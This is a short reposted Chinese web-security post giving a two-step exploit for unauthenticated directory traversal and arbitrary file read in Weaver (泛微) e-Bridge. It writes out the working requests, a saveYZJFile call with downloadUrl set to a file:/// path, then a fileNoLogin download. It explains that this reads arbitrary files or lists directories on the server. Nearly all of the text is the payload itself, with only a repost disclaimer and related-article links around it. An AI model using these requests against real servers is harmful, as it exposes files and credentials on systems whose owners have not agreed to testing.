泛微云桥目录遍历+任意文件读取最新

本文转载自查看原文 2020-09-13 21:35 1224 web安全/ 泛微云桥

利用方式：

第一步：

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt

第二步：

/file/fileNoLogin/id

注：

downloadUrl参数填写文件的绝对路径时，可以造成任意文件读取；

downloadUrl参数填写目录的绝对路径时，可以造成目录遍历。

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 泛微云桥任意文件读取泛微云桥e-Bridge 目录遍历，任意文件读取泛微云桥任意文件读取漏洞泛微OA云桥未授权任意文件读取目录浏览(目录遍历)漏洞和任意文件读取/下载漏洞任意文件读取任意文件读取 Apache Solr最新任意文件读取漏洞任意文件读取和上传 7、任意文件读取与下载